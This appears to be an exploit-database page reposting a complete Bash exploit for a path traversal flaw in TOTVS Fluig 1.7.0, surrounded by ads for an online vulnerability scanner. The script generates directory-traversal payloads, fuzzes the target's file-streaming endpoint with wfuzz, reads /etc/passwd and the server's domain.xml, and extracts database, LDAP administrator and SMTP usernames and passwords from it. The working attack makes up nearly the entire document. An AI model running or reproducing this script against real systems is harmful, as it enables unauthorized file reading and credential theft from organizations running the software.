fluig 1.7.0 path traversal

▸▸▸ Exploit & Vulnerability >>   webapps exploit & multiple vulnerability




Online Vulnerability Scanner Tools
fluig 1.7.0 path traversal Code Code... 
				
# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124

#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --

function create-payload {
    > wordlist.txt
    count=1
    while [[ $count -le $npayload ]]; do
                                                                        # WINDOWS PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
                                                                        # LINUX PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        count=$[$count + 1]
    done
}

function manual-mode {
    while :; do
        echo
        echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
        echo
        echo -e "\033[0;32m   -[ clear          -     Clear Screen\033[0m"
        echo -e "\033[0;32m   -[ target         -     Set a target\033[0m"
        echo -e "\033[0;32m   -[ director/file  -     Ex: /etc/passwd\033[0m"
        echo -e "\033[0;32m   -[ info           -     Target info and parse 'domain.xml' file ( require target )\033[0m"
        echo
        echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
        path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
        mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
        if [[ $path == 'info' ]]; then
            clear
            cat banner
            domain-xml
        elif [[ $path == 'clear' ]]; then
            clear
        elif [[ $path == 'target' ]]; then
            XmlPayload=''
            echo
            echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
            echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
            enum
       else
           echo
           echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
           wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
           DirPath=$(head -1 payload.txt)
       if [[ $DirPath  == '' ]]; then
           echo
           echo -e '            \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
       else
           curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
           echo
           echo -e '\033[0;31m'$path'\033[0m'
           echo
           cat report/$mdr/$mkfile
           echo
           pwd=$(pwd)
           echo
           echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
      fi
      fi
    done
}

function domain-xml {
    domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
    echo
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
    echo
    echo -e '            \033[0;33m[!] INFORMATION\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $XmlPayload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $XmlPayload
    echo
    echo -e '            \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
    echo 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    echo
    echo -e '            \033[0;31m[!] SMTP SETTINGS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
    echo
    manual-mode
fi
}

function enum {
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
mkdir -p report/$mdr
    if [[ $url == '' ]]; then
        clear
        cat banner
        echo -e '   \033[0;31m-[  Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[        Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[           ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
        manual-mode
    elif [[ $npayload == '' ]]; then
        npayload=25
        clear
        cat banner
        echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        echo
        create-payload
    else
        clear
        cat banner
        echo -e '     \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        create-payload
    fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
    clear
    cat banner
    echo -e '  \033[0;32m | TOTVS FLUIG -  PATH ENUMERATION AND XML ANALISYS \033[0m'
    echo
    echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
    echo
    manual-mode
else
    param=$(echo $payload | base64 -d |  cut -d '.' -f1)
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
    echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
    echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
    wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $payload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $payload
    echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
    manual-mode
else
    curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
    manual-mode
fi
}
enum

Fluig 1.7.0 path traversal Vulnerability / Exploit Source : Fluig 1.7.0 path traversal



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.